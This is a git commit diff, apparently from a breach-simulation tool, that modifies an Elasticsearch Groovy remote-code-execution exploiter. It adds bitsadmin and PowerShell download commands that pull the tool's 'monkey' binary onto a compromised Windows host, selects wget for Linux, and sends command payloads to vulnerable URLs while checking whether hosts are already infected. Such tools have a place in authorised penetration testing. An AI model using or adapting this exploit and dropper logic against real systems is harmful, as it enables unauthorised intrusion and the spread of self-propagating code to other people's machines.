Commands tested and working on windows.

This commit is contained in:
Vakaris 2018-07-24 15:55:34 +03:00
parent 7e2cc86ab9
commit a54eedec11
1 changed files with 19 additions and 6 deletions

View File

@ -6,13 +6,14 @@
import json import json
import logging import logging
import requests import requests
from model import DROPPER_ARG
from network.elasticfinger import ES_SERVICE, ES_PORT from network.elasticfinger import ES_SERVICE, ES_PORT
from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth from tools import get_target_monkey, HTTPTools, build_monkey_commandline, get_monkey_depth
from exploit.web_rce import WebRCE from exploit.web_rce import WebRCE
from model import WGET_HTTP_UPLOAD, POWERSHELL_HTTP_UPLOAD_NOT_ESCAPED
import copy
import re
__author__ = 'danielg' __author__ = 'danielg'
@ -34,6 +35,10 @@ class ElasticGroovyExploiter(WebRCE):
DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder DOWNLOAD_TIMEOUT = 300 # copied from rdpgrinder
# Both commands are prepared for use in future development
RDP_CMDLINE_HTTP = 'bitsadmin /transfer Update /download /priority high %(http_path)s %(monkey_path)s'
POWERSHELL_COMMAND = r"powershell -Command \\\"Invoke-WebRequest -Uri '%(http_path)s' -OutFile '%(monkey_path)s' -UseBasicParsing\\\""
_TARGET_OS_TYPE = ['linux', 'windows'] _TARGET_OS_TYPE = ['linux', 'windows']
def __init__(self, host): def __init__(self, host):
@ -56,14 +61,22 @@ class ElasticGroovyExploiter(WebRCE):
if not vulnerable_urls: if not vulnerable_urls:
return False return False
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], self._config): # Extra escaping required:
config = copy.deepcopy(self._config)
config.dropper_target_path_win_32 = r"C:\\\\Windows\\\\monkey32.exe"
config.dropper_target_path_win_64 = r"C:\\\\Windows\\\\monkey64.exe"
if self.skip_exist and WebRCE.check_remote_files(self.host, exploiter, vulnerable_urls[0], config):
LOG.info("Host %s was already infected under the current configuration, done" % self.host) LOG.info("Host %s was already infected under the current configuration, done" % self.host)
return True return True
if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]): if not WebRCE.set_host_arch(self.host, exploiter, vulnerable_urls[0]):
return False return False
data = WebRCE.upload_monkey(self.host, self._config, exploiter, vulnerable_urls[0]) commands = {'windows': self.RDP_CMDLINE_HTTP,
'linux': WGET_HTTP_UPLOAD}
data = WebRCE.upload_monkey(self.host, config, exploiter, vulnerable_urls[0], commands)
# We can't use 'if not' because response may be '' # We can't use 'if not' because response may be ''
if data is not False and data['response'] == False: if data is not False and data['response'] == False:
@ -81,7 +94,7 @@ class ElasticGroovyExploiter(WebRCE):
payload = self.JAVA_CMD % command payload = self.JAVA_CMD % command
response = requests.get(url, data=payload) response = requests.get(url, data=payload)
result = self.get_results(response) result = self.get_results(response)
if not result: # not vulnerable if not result:
return False return False
return result[0] return result[0]